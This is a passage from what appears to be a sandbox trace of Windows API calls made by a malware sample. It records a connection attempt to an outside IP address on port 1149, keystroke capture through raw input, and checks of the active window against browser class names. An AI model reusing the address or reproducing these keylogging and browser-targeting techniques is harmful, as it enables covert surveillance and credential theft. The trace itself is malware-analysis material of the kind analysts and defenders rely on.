wRemoveMsg=0x0 | out: lpMsg=0x30fb80) returned 0 [0214.097] WaitMessage () returned 1 [0214.100] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0214.100] IsWindow (hWnd=0x50276) returned 1 [0214.101] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0214.101] GetParent (hWnd=0x50276) returned 0x0 [0214.101] TranslateMessage (lpMsg=0x30fb80) returned 0 [0214.101] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0214.101] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xc02b, wParam=0x2, lParam=0x6029e) returned 0x0 [0214.101] GetLastError () returned 0x0 [0214.101] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 0 [0214.101] GetTickCount () returned 0x3aade [0214.101] GetTickCount () returned 0x3aade [0214.101] GetTickCount () returned 0x3aade [0214.101] PeekMessageA (in: lpMsg=0x30fae4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fae4) returned 0 [0214.101] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fb80) returned 0 [0214.101] WaitMessage () returned 1 [0214.102] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0214.102] IsWindow (hWnd=0x50276) returned 1 [0214.102] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0214.102] GetParent (hWnd=0x50276) returned 0x0 [0214.102] TranslateMessage (lpMsg=0x30fb80) returned 0 [0214.102] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0214.102] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xc02b, wParam=0x2, lParam=0x40196) returned 0x0 [0214.102] GetLastError () returned 0x0 [0214.102] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 0 [0214.103] GetTickCount () returned 0x3aade [0214.103] GetTickCount () returned 0x3aade [0214.103] GetTickCount () returned 0x3aade [0214.103] PeekMessageA (in: lpMsg=0x30fae4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fae4) returned 0 [0214.103] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fb80) returned 0 [0214.103] WaitMessage () returned 1 [0214.123] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0214.123] IsWindow (hWnd=0x50276) returned 1 [0214.123] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0214.123] GetParent (hWnd=0x50276) returned 0x0 [0214.123] TranslateMessage (lpMsg=0x30fb80) returned 0 [0214.123] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0214.123] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xc02b, wParam=0x6, lParam=0x50196) returned 0x0 [0214.123] GetLastError () returned 0x0 [0214.123] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 0 [0214.123] GetTickCount () returned 0x3aaee [0214.123] GetTickCount () returned 0x3aaee [0214.123] GetTickCount () returned 0x3aaee [0214.123] PeekMessageA (in: lpMsg=0x30fae4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fae4) returned 0 [0214.123] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fb80) returned 0 [0214.123] WaitMessage () returned 1 [0216.342] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0216.343] TranslateMessage (lpMsg=0x30fb80) returned 0 [0216.343] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0216.343] GetCurrentProcessId () returned 0x35c [0216.343] PeekMessageA (in: lpMsg=0x30f8c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30f8c8) returned 0 [0216.343] GetTickCount () returned 0x3b3a5 [0216.343] GetTickCount () returned 0x3b3a5 [0216.343] GetTickCount () returned 0x3b3a5 [0216.343] GetTickCount () returned 0x3b3a5 [0216.343] IsWindowVisible (hWnd=0x20286) returned 0 [0216.343] Sleep (dwMilliseconds=0x0) [0216.357] Sleep (dwMilliseconds=0x1) [0216.373] GetLastError () returned 0x0 [0216.373] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0216.373] IMalloc:Alloc (This=0x75e366bc, cb=0x4b) returned 0x6d2df8 [0216.373] DispCallFunc (pvInstance=0x6cfda0, oVft=0x1c, cc=0x4, vtReturn=0xa, cActuals=0x1, prgvt=0x6d2e40, prgpvarg=0x6d2e38, pvargResult=0x30f810) returned 0x0 [0216.374] GetUserDefaultLCID () returned 0x409 [0216.374] VarI4FromStr (in: strIn="1149", lcid=0x409, dwFlags=0x0, plOut=0x30edd0 | out: plOut=0x30edd0) returned 0x0 [0216.374] htons (hostshort=0x47d) returned 0x7d04 [0216.374] GetLastError () returned 0x0 [0216.374] SysStringLen (param_1="46.183.220.14") returned 0xd [0216.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="46.183.220.14", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0216.374] inet_addr (cp="46.183.220.14") returned 0xedcb72e [0216.374] GetLastError () returned 0x0 [0216.374] SysStringByteLen (bstr="㘴ㄮ㌸㈮〲ㄮ4") returned 0xd [0216.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20c4, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0216.374] ITypeInfo:LocalInvoke (This=0x6e4d94) returned 0x0 [0216.375] socket (af=2, type=1, protocol=6) returned 0x188 [0216.375] GetLastError () returned 0x0 [0216.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=8, lpMultiByteStr=0x30ed14, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 8 [0216.375] connect (s=0x188, name=0x30ed0c*(sa_family=2, sin_port=0x47d, sin_addr="46.183.220.14"), namelen=16) returned -1 [0217.630] GetLastError () returned 0x274d [0217.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30ed14, cbMultiByte=8, lpWideCharStr=0x30ed2c, cchWideChar=8 | out: lpWideCharStr="") returned 8 [0217.630] closesocket (s=0x188) returned 0 [0217.630] GetLastError () returned 0x0 [0217.630] IMalloc:Free (This=0x75e366bc, pv=0x6d2df8) [0217.631] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 0 [0217.631] GetTickCount () returned 0x3b8a4 [0217.631] GetTickCount () returned 0x3b8a4 [0217.631] GetTickCount () returned 0x3b8a4 [0217.631] PeekMessageA (in: lpMsg=0x30fae4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fae4) returned 0 [0217.631] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fb80) returned 0 [0217.631] WaitMessage () returned 1 [0220.482] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0220.482] IsWindow (hWnd=0x50276) returned 1 [0220.482] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0220.482] GetParent (hWnd=0x50276) returned 0x0 [0220.482] TranslateMessage (lpMsg=0x30fb80) returned 0 [0220.482] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0220.482] SetErrorMode (uMode=0x8001) returned 0x8001 [0220.482] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77820000 [0220.483] SetErrorMode (uMode=0x8001) returned 0x8001 [0220.483] GetProcAddress (hModule=0x77820000, lpProcName="GetRawInputData") returned 0x7789836f [0220.483] GetRawInputData (in: hRawInput=0x1002b3, uiCommand=0x10000003, pData=0x30f8f0, pcbSize=0x30f920, cbSizeHeader=0x10 | out: pData=0x30f8f0, pcbSize=0x30f920) returned 0x20 [0220.483] GetLastError () returned 0x0 [0220.483] SetErrorMode (uMode=0x8001) returned 0x8001 [0220.483] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77820000 [0220.483] SetErrorMode (uMode=0x8001) returned 0x8001 [0220.483] GetProcAddress (hModule=0x77820000, lpProcName="PostMessageA") returned 0x77843baa [0220.483] PostMessageA (hWnd=0x50276, Msg=0x290, wParam=0x5b, lParam=0x0) returned 1 [0220.483] GetLastError () returned 0x0 [0220.483] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xff, wParam=0x1, lParam=0x1002b3) returned 0x0 [0220.483] GetLastError () returned 0x0 [0220.483] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0220.484] IsWindow (hWnd=0x50276) returned 1 [0220.484] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0220.484] GetParent (hWnd=0x50276) returned 0x0 [0220.484] TranslateMessage (lpMsg=0x30fb80) returned 0 [0220.484] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0220.484] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0x290, wParam=0x5b, lParam=0x0) returned 0x0 [0220.484] GetLastError () returned 0x0 [0220.484] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0220.484] IsWindow (hWnd=0x50276) returned 1 [0220.484] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0220.484] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0220.484] GetParent (hWnd=0x50276) returned 0x0 [0220.484] TranslateMessage (lpMsg=0x30fb80) returned 1 [0220.484] DispatchMessageA (lpMsg=0x30fb80) returned 0x1 [0220.484] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0x100, wParam=0x5b, lParam=0x0) returned 0x1 [0220.484] GetLastError () returned 0x0 [0220.485] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 0 [0220.485] GetTickCount () returned 0x3c3cb [0220.485] GetTickCount () returned 0x3c3cb [0220.485] GetTickCount () returned 0x3c3cb [0220.485] PeekMessageA (in: lpMsg=0x30fae4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fae4) returned 0 [0220.485] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fb80) returned 0 [0220.485] WaitMessage () returned 1 [0220.500] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0220.500] IsWindow (hWnd=0x50276) returned 1 [0220.501] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0220.501] GetParent (hWnd=0x50276) returned 0x0 [0220.501] TranslateMessage (lpMsg=0x30fb80) returned 0 [0220.501] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0220.501] GetRawInputData (in: hRawInput=0x1a0265, uiCommand=0x10000003, pData=0x30f8f0, pcbSize=0x30f920, cbSizeHeader=0x10 | out: pData=0x30f8f0, pcbSize=0x30f920) returned 0x20 [0220.501] GetLastError () returned 0x0 [0220.501] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xff, wParam=0x1, lParam=0x1a0265) returned 0x0 [0220.501] GetLastError () returned 0x0 [0220.501] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 0 [0220.501] GetTickCount () returned 0x3c3da [0220.501] GetTickCount () returned 0x3c3da [0220.501] GetTickCount () returned 0x3c3da [0220.501] PeekMessageA (in: lpMsg=0x30fae4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fae4) returned 0 [0220.501] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fb80) returned 0 [0220.501] WaitMessage () returned 1 [0220.512] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0220.512] IsWindow (hWnd=0x50276) returned 1 [0220.512] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0220.512] GetParent (hWnd=0x50276) returned 0x0 [0220.512] TranslateMessage (lpMsg=0x30fb80) returned 0 [0220.512] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0220.512] GetRawInputData (in: hRawInput=0xe00f1, uiCommand=0x10000003, pData=0x30f8f0, pcbSize=0x30f920, cbSizeHeader=0x10 | out: pData=0x30f8f0, pcbSize=0x30f920) returned 0x20 [0220.512] GetLastError () returned 0x0 [0220.512] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xff, wParam=0x1, lParam=0xe00f1) returned 0x0 [0220.512] GetLastError () returned 0x0 [0220.512] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 0 [0220.512] GetTickCount () returned 0x3c3ea [0220.512] GetTickCount () returned 0x3c3ea [0220.513] GetTickCount () returned 0x3c3ea [0220.513] PeekMessageA (in: lpMsg=0x30fae4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fae4) returned 0 [0220.513] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fb80) returned 0 [0220.513] WaitMessage () returned 1 [0220.678] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0220.678] IsWindow (hWnd=0x50276) returned 1 [0220.678] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0220.678] GetParent (hWnd=0x50276) returned 0x0 [0220.678] TranslateMessage (lpMsg=0x30fb80) returned 0 [0220.678] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0220.678] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xc02b, wParam=0x4, lParam=0x0) returned 0x0 [0220.678] GetLastError () returned 0x0 [0220.678] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 0 [0220.678] GetTickCount () returned 0x3c486 [0220.678] GetTickCount () returned 0x3c486 [0220.678] GetTickCount () returned 0x3c486 [0220.678] PeekMessageA (in: lpMsg=0x30fae4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fae4) returned 0 [0220.678] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fb80) returned 0 [0220.678] WaitMessage () returned 1 [0220.793] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0220.793] IsWindow (hWnd=0x50276) returned 1 [0220.793] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0220.793] GetParent (hWnd=0x50276) returned 0x0 [0220.793] TranslateMessage (lpMsg=0x30fb80) returned 0 [0220.793] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0220.793] GetRawInputData (in: hRawInput=0x1c0265, uiCommand=0x10000003, pData=0x30f8f0, pcbSize=0x30f920, cbSizeHeader=0x10 | out: pData=0x30f8f0, pcbSize=0x30f920) returned 0x20 [0220.793] GetLastError () returned 0x0 [0220.793] PostMessageA (hWnd=0x50276, Msg=0x290, wParam=0x12, lParam=0x0) returned 1 [0220.793] GetLastError () returned 0x0 [0220.793] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xff, wParam=0x1, lParam=0x1c0265) returned 0x0 [0220.793] GetLastError () returned 0x0 [0220.794] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0220.794] IsWindow (hWnd=0x50276) returned 1 [0220.794] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0220.794] GetParent (hWnd=0x50276) returned 0x0 [0220.794] TranslateMessage (lpMsg=0x30fb80) returned 0 [0220.794] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0220.794] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0x290, wParam=0x12, lParam=0x0) returned 0x0 [0220.794] GetLastError () returned 0x0 [0220.794] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0220.794] IsWindow (hWnd=0x50276) returned 1 [0220.794] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0220.794] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0220.794] GetParent (hWnd=0x50276) returned 0x0 [0220.794] TranslateMessage (lpMsg=0x30fb80) returned 1 [0220.794] DispatchMessageA (lpMsg=0x30fb80) returned 0x1 [0220.794] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0x100, wParam=0x12, lParam=0x0) returned 0x1 [0220.794] GetLastError () returned 0x0 [0220.794] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0220.795] IsWindow (hWnd=0x50276) returned 1 [0220.795] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0220.795] GetParent (hWnd=0x50276) returned 0x0 [0220.795] TranslateMessage (lpMsg=0x30fb80) returned 0 [0220.795] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0220.795] GetRawInputData (in: hRawInput=0xf00f1, uiCommand=0x10000003, pData=0x30f8f0, pcbSize=0x30f920, cbSizeHeader=0x10 | out: pData=0x30f8f0, pcbSize=0x30f920) returned 0x20 [0220.795] GetLastError () returned 0x0 [0220.795] PostMessageA (hWnd=0x50276, Msg=0x290, wParam=0x73, lParam=0x0) returned 1 [0220.795] GetLastError () returned 0x0 [0220.795] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xff, wParam=0x1, lParam=0xf00f1) returned 0x0 [0220.795] GetLastError () returned 0x0 [0220.795] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0220.795] IsWindow (hWnd=0x50276) returned 1 [0220.795] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0220.795] GetParent (hWnd=0x50276) returned 0x0 [0220.795] TranslateMessage (lpMsg=0x30fb80) returned 0 [0220.795] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0220.795] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0x290, wParam=0x73, lParam=0x0) returned 0x0 [0220.795] GetLastError () returned 0x0 [0220.795] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0220.796] IsWindow (hWnd=0x50276) returned 1 [0220.796] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0220.796] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0220.796] GetParent (hWnd=0x50276) returned 0x0 [0220.796] TranslateMessage (lpMsg=0x30fb80) returned 1 [0220.796] DispatchMessageA (lpMsg=0x30fb80) returned 0x1 [0220.796] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0x100, wParam=0x73, lParam=0x0) returned 0x1 [0220.796] GetLastError () returned 0x0 [0220.796] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0220.796] IsWindow (hWnd=0x50276) returned 1 [0220.796] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0220.796] GetParent (hWnd=0x50276) returned 0x0 [0220.796] TranslateMessage (lpMsg=0x30fb80) returned 0 [0220.796] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0220.796] GetRawInputData (in: hRawInput=0x90285, uiCommand=0x10000003, pData=0x30f8f0, pcbSize=0x30f920, cbSizeHeader=0x10 | out: pData=0x30f8f0, pcbSize=0x30f920) returned 0x20 [0220.796] GetLastError () returned 0x0 [0220.796] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xff, wParam=0x1, lParam=0x90285) returned 0x0 [0220.796] GetLastError () returned 0x0 [0220.796] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0220.796] IsWindow (hWnd=0x50276) returned 1 [0220.797] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0220.797] GetParent (hWnd=0x50276) returned 0x0 [0220.797] TranslateMessage (lpMsg=0x30fb80) returned 0 [0220.797] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0220.797] GetRawInputData (in: hRawInput=0x70231, uiCommand=0x10000003, pData=0x30f8f0, pcbSize=0x30f920, cbSizeHeader=0x10 | out: pData=0x30f8f0, pcbSize=0x30f920) returned 0x20 [0220.797] GetLastError () returned 0x0 [0220.797] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xff, wParam=0x1, lParam=0x70231) returned 0x0 [0220.797] GetLastError () returned 0x0 [0220.797] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 0 [0220.797] GetTickCount () returned 0x3c503 [0220.797] GetTickCount () returned 0x3c503 [0220.797] GetTickCount () returned 0x3c503 [0220.797] PeekMessageA (in: lpMsg=0x30fae4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fae4) returned 0 [0220.797] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fb80) returned 0 [0220.797] WaitMessage () returned 1 [0220.990] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0220.990] IsWindow (hWnd=0x50276) returned 1 [0220.990] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0220.990] GetParent (hWnd=0x50276) returned 0x0 [0220.991] TranslateMessage (lpMsg=0x30fb80) returned 0 [0220.991] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0220.991] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xc02b, wParam=0x1, lParam=0x20206) returned 0x0 [0220.991] GetLastError () returned 0x0 [0220.991] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0220.991] IsWindow (hWnd=0x50276) returned 1 [0220.991] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0220.991] GetParent (hWnd=0x50276) returned 0x0 [0220.991] TranslateMessage (lpMsg=0x30fb80) returned 0 [0220.991] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0220.991] SendMessageA (hWnd=0x50276, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0220.991] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0220.991] GetLastError () returned 0x0 [0220.991] GetLastError () returned 0x0 [0220.991] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x30f848 | out: ppsaOut=0x30f848) returned 0x0 [0220.992] GetUserDefaultLCID () returned 0x409 [0220.992] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f604, cchData=6 | out: lpLCData="1252") returned 5 [0220.992] SysStringLen (param_1="user32.dll") returned 0xb [0220.992] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="user32.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0220.993] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f614 | out: ppsaOut=0x30f614) returned 0x0 [0220.993] GetUserDefaultLCID () returned 0x409 [0220.993] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f604, cchData=6 | out: lpLCData="1252") returned 5 [0220.993] SysStringLen (param_1="GetClassNameW") returned 0xe [0220.993] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetClassNameW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0220.993] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f614 | out: ppsaOut=0x30f614) returned 0x0 [0220.993] SetErrorMode (uMode=0x8001) returned 0x8001 [0220.993] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77820000 [0220.993] SetErrorMode (uMode=0x8001) returned 0x8001 [0220.993] GetProcAddress (hModule=0x77820000, lpProcName="GetClassNameW") returned 0x778382a9 [0220.993] SafeArrayDestroyDescriptor (psa=0x6d7238) returned 0x0 [0220.994] SafeArrayDestroyDescriptor (psa=0x6d7208) returned 0x0 [0220.994] GetClassNameW (in: hWnd=0x20206, lpClassName=0x6d8adc, nMaxCount=256 | out: lpClassName="#32770") returned 6 [0220.994] SafeArrayDestroyDescriptor (psa=0x6d71d8) returned 0x0 [0220.994] VarBstrCmp (bstrLeft="#32770", bstrRight="MozillaUIWindowClass", lcid=0x0, dwFlags=0x30001) returned 0x0 [0220.994] VarBstrCmp (bstrLeft="#32770", bstrRight="MozillaWindowClass", lcid=0x0, dwFlags=0x30001) returned 0x0 [0220.994] VarBstrCmp (bstrLeft="#32770", bstrRight="IEFrame", lcid=0x0, dwFlags=0x30001) returned 0x0 [0220.994] VarBstrCmp (bstrLeft="#32770", bstrRight="OpWindow", 